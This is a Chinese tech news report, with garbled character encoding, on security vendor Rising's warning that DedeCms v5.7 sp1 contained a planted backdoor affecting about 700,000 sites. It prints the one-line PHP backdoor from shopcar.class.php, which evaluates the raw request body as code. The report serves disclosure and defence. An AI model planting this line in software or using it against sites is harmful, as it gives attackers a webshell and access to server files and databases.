騰訊科技訊 3月22日消息,瑞星公司今日對(duì)外發(fā)布緊急警示:國內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門,黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限,獲取存儲(chǔ)在服務(wù)器上的文件和數(shù)據(jù)庫。
據(jù)CMS官方數(shù)據(jù)顯示,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建,涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及個(gè)人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員,使用瑞星網(wǎng)站密碼安全檢測系統(tǒng)查找后門并及時(shí)進(jìn)行封堵。
據(jù)瑞星專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個(gè)后門,黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,通過對(duì)服務(wù)器進(jìn)一步滲透攻擊,進(jìn)而獲取服務(wù)器的最高權(quán)限。
在黑客攻陷網(wǎng)站后,便可以直接訪問服務(wù)器上的文件、數(shù)據(jù)庫等信息。目前我國有大量網(wǎng)站采用該系統(tǒng),此后門或?qū)?dǎo)致大量用戶的信息泄露,造成極為嚴(yán)重的影響。
推薦閱讀
隨著Pandora網(wǎng)絡(luò)電臺(tái)在國外掀起一陣新的聽電臺(tái)熱潮,國內(nèi)領(lǐng)先的數(shù)字音樂廠商酷狗音樂亦推出了其電臺(tái)產(chǎn)品, 基于酷狗龐大的音樂曲庫,結(jié)合人工多維度地細(xì)致分類,通過收集用戶行為進(jìn)行算法優(yōu)化等推薦方法向用戶提供優(yōu)>>>詳細(xì)閱讀
本文標(biāo)題:瑞星:織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保
地址:http://www.xglongwei.com/a/kandian/20120322/43160.html
網(wǎng)友點(diǎn)評(píng)
精彩導(dǎo)讀
科技快報(bào)
品牌展示